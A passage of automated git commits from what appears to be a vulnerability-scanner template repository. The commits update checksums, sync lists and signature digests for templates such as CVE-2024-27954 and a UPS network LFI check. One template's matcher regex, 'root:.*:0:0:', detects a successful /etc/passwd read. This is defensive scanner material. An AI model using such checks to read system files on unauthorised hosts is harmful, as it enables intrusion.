@@ -32,6 +32,7 @@ http/cves/2023/CVE-2023-5830.yaml http/cves/2023/CVE-2023-5914.yaml http/cves/2024/CVE-2024-1212.yaml http/cves/2024/CVE-2024-1698.yaml +http/cves/2024/CVE-2024-27954.yaml http/exposed-panels/bynder-panel.yaml http/exposed-panels/cisco/cisco-expressway-panel.yaml http/exposed-panels/emqx-panel.yaml From 680534f3d80ad4e5123576cff3559d8a7bff60e7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 16:05:58 +0000 Subject: [PATCH 78/86] Auto Generated Templates Checksum [Fri Mar 22 16:05:58 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 243017a1a9..9e9ecefa2c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3105,6 +3105,7 @@ http/cves/2024/CVE-2024-25735.yaml:bb8f329838a1758c223d85cdbe23c820f8b61640 http/cves/2024/CVE-2024-27198.yaml:c4f066c0332dea8b23c9aa0990baa6b6b5c806bb http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27497.yaml:5ee80d14253ccdeec8c2bdc1c7e82a8062b4f487 +http/cves/2024/CVE-2024-27954.yaml:3fba338e3ad021e3d3eece7077f1f221337b05ed http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c http/default-logins/abb/cs141-default-login.yaml:a5902dd34ba373c6f4e2cba15adbd9bf1e75e9c7 
@@ -3112,7 +3113,7 @@ http/default-logins/activemq/activemq-default-login.yaml:d9c1716e5fab0e3cdd0ebaa http/default-logins/adminer-default-login.yaml:1dc0fbedf2bb856303230bf3c5be9f2ad1bf9f0e http/default-logins/aem/aem-default-login.yaml:932701c69be0aa181e7b40a5a6189ba34578015b http/default-logins/aem/aem-felix-console.yaml:43658ba960762d06a5c8be673078e3049cb7e71f -http/default-logins/alibaba/canal-default-login.yaml:7c9308b40deec5c04c4f140ee21a5d7be7a24525 +http/default-logins/alibaba/canal-default-login.yaml:53bee91e5473ba3be493bdb74fc8b2789b6f72fd http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9 http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b @@ -8176,7 +8177,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3e2acfb1564de13ccdeacca4c94b6b4733ef0b79 +templates-checksum.txt:8493340c3a7cf22d97222b000b5dfd83c2adb67c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2e8b3972266c8fcc15131b98e4131d45693ba7e0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 22 Mar 2024 16:06:34 +0000 Subject: [PATCH 79/86] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9f93d3bc1e..91a891f6bf 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml 
@@ -37,6 +37,7 @@ on: - 'http/cves/2023/CVE-2023-5914.yaml' - 'http/cves/2024/CVE-2024-1212.yaml' - 'http/cves/2024/CVE-2024-1698.yaml' + - 'http/cves/2024/CVE-2024-27954.yaml' - 'http/exposed-panels/bynder-panel.yaml' - 'http/exposed-panels/cisco/cisco-expressway-panel.yaml' - 'http/exposed-panels/emqx-panel.yaml' From a211cb32de26a4dc3d0f1d304a8ac96e5c98ae28 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 16:07:42 +0000 Subject: [PATCH 80/86] Auto Template Signing [Fri Mar 22 16:07:42 UTC 2024] :robot: --- http/cves/2024/CVE-2024-27954.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-27954.yaml b/http/cves/2024/CVE-2024-27954.yaml index cd4f2864c7..ea42f13279 100644 --- a/http/cves/2024/CVE-2024-27954.yaml +++ b/http/cves/2024/CVE-2024-27954.yaml @@ -35,3 +35,4 @@ http: - type: regex regex: - "root:.*:0:0:" +# digest: 4a0a00473045022100fe0fefeeca090cd190ad427541a138e93717d0eac2f27c00a2eec4bf5a63e30902202c2a3213ac5e28f8244ed547d1dd868bc948638e4cddaacee81de6d2f9422da1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 40e9e20846384fa7fd7b072ae5594a9f7d80a7d1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 22 Mar 2024 16:07:58 +0000 Subject: [PATCH 81/86] Auto Generated New Template Addition List [Fri Mar 22 16:07:58 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 31c093cbae..bcdb3ae070 100644 --- a/.new-additions +++ b/.new-additions @@ -46,6 +46,7 @@ http/exposures/files/generic-db.yaml http/misconfiguration/installer/posteio-installer.yaml http/osint/phishing/kakao-login-phish.yaml http/osint/phishing/naver-login-phish.yaml +http/technologies/directus-detect.yaml http/technologies/microsoft/aspnet-version-detect.yaml http/technologies/microsoft/aspnetmvc-version-disclosure.yaml http/technologies/wing-ftp-service-detect.yaml From 7cb6746e68ba6f8e3455f0290e0107695039ecf2 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Fri, 22 Mar 2024 16:08:03 +0000 Subject: [PATCH 82/86] Auto Generated Templates Checksum [Fri Mar 22 16:08:03 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9e9ecefa2c..b909c5235f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6413,6 +6413,7 @@ http/technologies/dell/dell-idrac8-detect.yaml:1dff3a1be021d38ea8846d6151c920edb http/technologies/dell/dell-idrac9-detect.yaml:44da5eecdb4a220ccde1aecdd8c801986a988367 http/technologies/detect-sentry.yaml:f4f51185253e23a6e3db1f4bbcb1a37bebf4da1a http/technologies/devexpress-detect.yaml:6a5327a8a84357f2e365da16936697859e0f6020 +http/technologies/directus-detect.yaml:6284abebab6cc1c447f02dd03c711303a4cdd22f http/technologies/dreambox-detect.yaml:35362632d9ed50a1e5b4513bfc5a09543c63e431 http/technologies/drupal-detect.yaml:5c269fdf58cf085a8ac062b1f23cd8b3a0ef7f99 http/technologies/dwr-index-detect.yaml:11ebf6bffb83d15af8cbca407b38fee3d67b72ab @@ -8177,7 +8178,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8493340c3a7cf22d97222b000b5dfd83c2adb67c +templates-checksum.txt:7d174505fe20e972aab2cdebc767e614166f25aa wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cb61944fc741366088171f6b6912ad7a0a15f1e1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 22 Mar 2024 16:08:40 +0000 Subject: [PATCH 83/86] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) 
diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 91a891f6bf..065d901ed1 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -51,6 +51,7 @@ on: - 'http/misconfiguration/installer/posteio-installer.yaml' - 'http/osint/phishing/kakao-login-phish.yaml' - 'http/osint/phishing/naver-login-phish.yaml' + - 'http/technologies/directus-detect.yaml' - 'http/technologies/microsoft/aspnet-version-detect.yaml' - 'http/technologies/microsoft/aspnetmvc-version-disclosure.yaml' - 'http/technologies/wing-ftp-service-detect.yaml' From d97f1be11a32b0183307136ca5b83819b4db13c5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 16:10:18 +0000 Subject: [PATCH 84/86] Auto Generated Templates Checksum [Fri Mar 22 16:10:18 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b909c5235f..e6c7f28525 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3105,7 +3105,7 @@ http/cves/2024/CVE-2024-25735.yaml:bb8f329838a1758c223d85cdbe23c820f8b61640 http/cves/2024/CVE-2024-27198.yaml:c4f066c0332dea8b23c9aa0990baa6b6b5c806bb http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27497.yaml:5ee80d14253ccdeec8c2bdc1c7e82a8062b4f487 -http/cves/2024/CVE-2024-27954.yaml:3fba338e3ad021e3d3eece7077f1f221337b05ed +http/cves/2024/CVE-2024-27954.yaml:d1056017d0cbf62dc6a2b0b6372ca2980992155c http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c http/default-logins/abb/cs141-default-login.yaml:a5902dd34ba373c6f4e2cba15adbd9bf1e75e9c7 
@@ -7617,6 +7617,7 @@ http/vulnerabilities/other/unauth-hoteldruid-panel.yaml:279bc487a6928ac8687f5e2e http/vulnerabilities/other/unauth-spark-api.yaml:d3205ad468e29b3fd6d59637db539399b1c93c64 http/vulnerabilities/other/unifi-network-log4j-rce.yaml:ab0f3c5c653a7406ee48d9a1ee0b1b810801c6db http/vulnerabilities/other/universal-media-xss.yaml:18afec046906e2afc3c2a1b9eee94e6fed1008e9 +http/vulnerabilities/other/ups-network-lfi.yaml:973370147cfb7fb529fd2c978f4900ccef9215af http/vulnerabilities/other/vanguard-post-xss.yaml:ebea3529277da89f92f263b4c2e01b1440ead349 http/vulnerabilities/other/viewlinc-crlf-injection.yaml:dc9df9a7e0f610a07fe7611c166ae358706450ce http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml:e69e54fb6312bebd4dd9e111db93045fea6eedef @@ -8178,7 +8179,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7d174505fe20e972aab2cdebc767e614166f25aa +templates-checksum.txt:73085eb95bd53b989402733d6c0a2d505062e246 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 75aa75adc1c4b4a3d192b323b0ba9e0a2db33ff7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 16:11:18 +0000 Subject: [PATCH 85/86] Auto Generated Templates Checksum [Fri Mar 22 16:11:18 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e6c7f28525..0fdd4f57ac 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt 
@@ -4116,6 +4116,7 @@ http/exposed-panels/skycaiji-admin-panel.yaml:361c2ff751869e4b694246e113ceaf3e0c http/exposed-panels/slocum-login.yaml:882558fc76eedef7ba2f13a9011a298046d85fe5 http/exposed-panels/smartping-dashboard.yaml:95eec001a41f2fe0c66ebfc58e0560cd9755e5cd http/exposed-panels/snapcomms-panel.yaml:2415e99a631ec5250f3f9be63e99f91d15d6f494 +http/exposed-panels/softether-vpn-panel.yaml:9c37a5f904da87f0cc892b4a675a6b50432e2708 http/exposed-panels/solarview-compact-panel.yaml:be95efca10dca1f6b755b1d7e6f91e4f77e0594f http/exposed-panels/solarwinds-arm-panel.yaml:2aaf482c52b633dfe17bad946cfed56da0282d0f http/exposed-panels/solarwinds-orion.yaml:d04c286187f0f4b310d767196124eead9bab0a89 @@ -8179,7 +8180,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:73085eb95bd53b989402733d6c0a2d505062e246 +templates-checksum.txt:608bfc81bcb7af107a327b22977799f2016e33a5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 005231adaaf49a8f841ea4aacd25c6bf0b2b0abf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 16:12:05 +0000 Subject: [PATCH 86/86] Auto Template Signing [Fri Mar 22 16:12:05 UTC 2024] :robot: --- http/technologies/directus-detect.yaml | 1 + http/vulnerabilities/other/ups-network-lfi.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/technologies/directus-detect.yaml b/http/technologies/directus-detect.yaml index 1b70af7072..2e01cf6172 100644 --- a/http/technologies/directus-detect.yaml +++ b/http/technologies/directus-detect.yaml 
@@ -25,3 +25,4 @@ http: words: - "X-Powered-By: Directus" case-insensitive: true +# digest: 490a004630440220479c02cfe34e7b2c20a1a976a14a53f0b1aafded106d55d08b9805cd3715425c02202a6fb91a2289a5fae5ff1ce56b8fef09bfcec164a5546e1ad4a8145584d5212b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/ups-network-lfi.yaml b/http/vulnerabilities/other/ups-network-lfi.yaml index 849a2a4d87..4ac9d89d60 100644 --- a/http/vulnerabilities/other/ups-network-lfi.yaml +++ b/http/vulnerabilities/other/ups-network-lfi.yaml @@ -35,3 +35,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100f89ac4d5fc64a14de49e8cb3c38e50b5639b4232cf5be0590f1bfdc1d4a6984f0220378dff779681382e54be7b3f7a240fff7417804e84cb9fc58c17e2c84cb04e0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file